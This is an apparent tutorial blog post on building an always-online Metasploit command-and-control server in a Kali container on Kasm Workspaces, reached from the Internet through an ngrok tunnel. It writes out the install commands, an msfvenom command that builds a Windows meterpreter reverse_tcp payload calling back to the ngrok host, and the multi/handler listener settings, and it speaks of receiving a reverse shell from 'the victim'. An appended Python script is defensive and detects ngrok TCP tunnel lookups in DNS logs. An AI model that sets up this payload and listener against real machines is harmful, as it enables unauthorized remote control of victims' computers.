In this article, I will walk you through setting up your Command and Control Server using Metasploit and Kasm Workspaces.
Metasploit is a penetration testing framework that contains a payload generator and many modules to enumerate and exploit known vulnerabilities on different targets. It can also be used as a Command and Control (C&C) server for managing target sessions, maintaining persistence, performing post-exploitation, etc. It is a must-have tool in any hacker's toolkit.
Kasm is a Docker container streaming platform which enables you to run private sessions of Docker apps and use them directly from your web browser. It supports many awesome features like session casting, the ability to destroy/pause/resume sessions and so on. With the help of Kasm, you can keep your Docker apps organized in one place and readily usable.
We will first set up a Kali Linux hacking lab in Kasm Workspaces and then use the pre-installed Metasploit framework from the Kali Linux container.
Kasm can be installed on any Linux machine with at least 2 CPU cores, 4 GB memory and 50 GB SSD storage. I like to install Kasm on a cloud instance because I want my C&C server to be always available and online. However, you can install Kasm on your local Linux machine as well. The official installation guide for Kasm is here: https://kasmweb.com/docs/latest/index.html
Just run these five simple commands to install Kasm:
# Go to /tmp
cd /tmp
# Download Kasm
curl -O https://kasm-static-content.s3.amazonaws.com/kasm_release_220.127.116.11a7abb.tar.gz
# Extract the archive that was just downloaded
tar -xf kasm_release_220.127.116.11a7abb.tar.gz
# Install Kasm
sudo bash kasm_release/install.sh
Great! Now that you have Kasm installed, you can log in to your dashboard by going to https://<YOUR_IP>
You can log in with the default credentials that were displayed on the terminal when Kasm finished installing.
Install Kali Linux
Kali Linux is a Linux distribution designed for digital forensics and penetration testing. It comes with Metasploit pre-installed.
From your dashboard, go to Workspaces -> Add from Registry and install Kali Linux from the list of available Docker images.
Once Kali is installed, go back to Workspaces and open a new session.
That's it! You now have a Kali Linux session.
Since you are using Kali Linux as a Docker container, you will not be able to receive inbound connections from the Internet. However, it is very important for your C&C server to be available on the Internet to receive connections from the targets. To fix this, you can use ngrok to create a secure tunnel from the Internet to your local network interface.
Go to ngrok.com, create an account and download ngrok.
On the download page, you will also find the command to activate your ngrok tool with your unique auth token. Simply copy and paste it into your terminal to authenticate.
Now, use the following command to set up a tunnel:
./ngrok tcp 1560
This will create a tunnel from the ngrok servers (which are accessible from the Internet) to your localhost on port 1560. Feel free to use whatever port you like.
This will generate an ngrok address (6.tcp.ngrok.io in my case) and a unique port (17800 in my case).
You can use this address and port whenever you are creating a payload. For example, let me create a payload with msfvenom for a Windows target with the command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17800 -f exe > payload.exe
Notice how I used my ngrok address for the LHOST and my unique ngrok port for the LPORT. When a connection is received on this address and port, ngrok forwards it to my localhost on port 1560.
Now, to set up the listener, I will just open my Metasploit console with the msfconsole command and use exploit/multi/handler, then set the payload to the same one (windows/x64/meterpreter/reverse_tcp).
I will then set the LHOST to localhost and LPORT to 1560 because this is where the connections from the Internet will be forwarded to by ngrok.
That's it! I will now simply type run and my listener is online. Now, whenever the victim executes the payload, I get a reverse shell on my msfconsole!
And just like that, we are able to set up a C&C server on the cloud with the help of Kasm Workspaces and Metasploit!
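From the defender's side, the setup above means a host that runs the payload resolves and connects out to an ngrok TCP tunnel hostname such as 6.tcp.ngrok.io. The following added example (not part of the original article) scans DNS query logs for such lookups and groups them by client; the log format, the sample lines, the allowlisted IP and the optional region label in the pattern are assumptions.

```python
import re
from collections import defaultdict

# Matches ngrok TCP tunnel endpoints such as 6.tcp.ngrok.io (the form shown in
# the article). The optional region label (e.g. 0.tcp.eu.ngrok.io) is an assumption.
NGROK_TCP = re.compile(r"^\d+\.tcp(\.[a-z0-9-]+)?\.ngrok\.io$")

# Constructed sample, oldest first: "<timestamp> <client_ip> <query_name> <query_type>".
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.5.23 6.tcp.ngrok.io. A
2024-05-01T10:00:02Z 10.0.5.23 www.example.com. A
2024-05-01T10:00:09Z 10.0.5.40 0.TCP.EU.NGROK.IO. A
2024-05-01T10:01:30Z 10.0.5.23 6.tcp.ngrok.io. A
2024-05-01T10:02:00Z 10.0.9.7 6.tcp.ngrok.io. A
2024-05-01T10:02:05Z 10.0.5.41 ngrok.io.lookalike.example. A
malformed line
"""

def is_ngrok_tcp(qname):
    """True if qname is an ngrok TCP tunnel hostname (case and trailing dot ignored)."""
    return bool(NGROK_TCP.match(qname.rstrip(".").lower()))

def find_ngrok_clients(log_text, allowlist=()):
    """Return {client_ip: {"count", "first_seen", "last_seen", "names"}}."""
    hits = defaultdict(lambda: {"count": 0, "first_seen": None,
                                "last_seen": None, "names": set()})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip lines that do not fit the assumed format
        ts, client, qname, _qtype = fields
        if client in allowlist or not is_ngrok_tcp(qname):
            continue
        entry = hits[client]
        entry["count"] += 1
        entry["first_seen"] = entry["first_seen"] or ts
        entry["last_seen"] = ts  # relies on the log being in chronological order
        entry["names"].add(qname.rstrip(".").lower())
    return dict(hits)

if __name__ == "__main__":
    # 10.0.9.7 is a hypothetical host approved to use ngrok.
    for ip, info in find_ngrok_clients(SAMPLE_DNS_LOG, {"10.0.9.7"}).items():
        print(ip, info["count"], info["first_seen"], info["last_seen"],
              sorted(info["names"]))
```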